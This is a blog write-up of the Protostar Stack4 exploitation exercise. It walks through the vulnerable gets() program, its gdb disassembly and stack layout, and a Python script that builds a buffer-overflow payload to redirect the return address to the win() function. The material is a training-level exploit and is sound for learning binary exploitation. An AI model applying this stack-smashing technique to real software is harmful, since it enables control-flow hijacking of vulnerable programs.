Binary Exploitation Protostar Stack4 - Walkthrough - writeup

Hello Guyz,



Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Stack4 Level.
In this level, Our goal is to overwrite Return pointer Address Onto The Stack, So that Instead Of Returning To Our main function, EIP (Instruction Pointer) will Return To Our Specific Function. Actually, Here We Have To Point Our Return Pointer To WIN function that is already Given In Program.

Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb

Source Codes

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

Hints

Stack4 takes a look at overwriting saved EIP and standard buffer overflows.

This level is at /opt/protostar/bin/stack4

Hints

A variety of introductory papers into buffer overflows may help.
gdb lets you do “run < input”
EIP is not directly after the end of buffer, compiler padding can also increase the size.


Disassembly Of Main Function

gdb-peda$ pdisass main
Dump of assembler code for function main:
   0x08048408 <+0>: push   ebp        -------------------
   0x08048409 <+1>: mov    ebp,esp                      | --> Initialise Function
   0x0804840b <+3>: and    esp,0xfffffff0  --------------
   0x0804840e <+6>: sub    esp,0x50  -----------------------> Creating Space in Stack 50 [hex]
   0x08048411 <+9>: lea    eax,[esp+0x10] ------------------> Load Variable Buffer Starting POint Address Into EAX 0x10 [hex]
   0x08048415 <+13>: mov    DWORD PTR [esp],eax ---------> Place EAX at the top of stack
   0x08048418 <+16>: call   0x804830c <gets@plt> --------> Call Get Function
=> 0x0804841d <+21>: leave  -----------------------------> Reverse Of Initialise FUnction
   0x0804841e <+22>: ret    -----------------------------> Return [Our Target is Next To This Instruction In stack] 




End of assembler dump.

Stack Status

STACK


0000| 0xffffcf80 --> 0xffffcf90 ('a' <repeats 64 times>)     ----------------
0004| 0xffffcf84 --> 0x2f ('/')                                              |---->  Other Arguments (Paddings)
0008| 0xffffcf88 --> 0xf7debdc8 --> 0x2b76 ('v+')                            |
0012| 0xffffcf8c --> 0xf7fd41b0 --> 0xf7ddf000 --> 0x464c457f ---------------
0016| 0xffffcf90 ('a' <repeats 64 times>) ----         ---------------> Get FUnction Starting Point
0020| 0xffffcf94 ('a' <repeats 60 times>)     |
0024| 0xffffcf98 ('a' <repeats 56 times>)     |
0028| 0xffffcf9c ('a' <repeats 52 times>)     |
0032| 0xffffcfa0 ('a' <repeats 48 times>)     |
0036| 0xffffcfa4 ('a' <repeats 44 times>)     |
0040| 0xffffcfa8 ('a' <repeats 40 times>)     | -------------------> Buffer 64 [Decimal]
0044| 0xffffcfac ('a' <repeats 36 times>)     |
0048| 0xffffcfb0 ('a' <repeats 32 times>)     |
0052| 0xffffcfb4 ('a' <repeats 28 times>)     |
0056| 0xffffcfb8 ('a' <repeats 24 times>)     |
0060| 0xffffcfbc ('a' <repeats 20 times>)     |
0064| 0xffffcfc0 ('a' <repeats 16 times>)     |
0068| 0xffffcfc4 ('a' <repeats 12 times>)     |
0072| 0xffffcfc8 ("aaaaaaaa")                 |
0076| 0xffffcfcc ("aaaa") ---------------------
0080| 0xffffcfd0 --> 0xf7f91000 --> 0x1b1db0-----
0084| 0xffffcfd4 --> 0xf7f91000 --> 0x1b1db0-----> Padds
0088| 0xffffcfd8 --> 0x0 ------------------------> Return Value
0092| 0xffffcfdc --> 0xf7df7637 (<__libc_start_main+247>: add    esp,0x10) <<<<------- [Injection Point]
0096| 0xffffcfe0 --> 0x1 




0         16                                      80    84    88    92     96
 ===========================================================================
  Paddings |  Bufffer this Area                    | pad | pad | EBP | RET |
 ===========================================================================

Our Mission

As I already wrote in starting of this post, we just need to Overwrite Return Address Of Main Function With Win Function Address.
Well, To Find The Address Of Win Function. Open Terminal And Type

:~# objdump -d path/to/stack4 | grep "win"

Exploit

#!/usr/bin/python
# -*- coding:utf-8 -*-





NP = '41'        # 41 [hex]  = a



# Total Buffer In Stack 50 in hex
tbis = [NP for i in range(80)]

# Another Buffer To Overflow Outside The Buffer Space
# External Buffer in Stack 16 [Decimal]
ebis = ['90' for i in range(16)]


# Update Return Pointer | 080483f4 
ebis[12:]=['08','04','83','f4'][::-1]


# add external and total buffer
tbis = tbis + ebis

# Remove Padding 0x10 [hex]
payload ='\\x'+ '\\x'.join([i for i in tbis[16:]])


# print variable
print payload.decode('string_escape')

For More Detailed Walk through Check Below Provided YouTube Video Playlist



Share this

Related Posts

Previous
Next Post »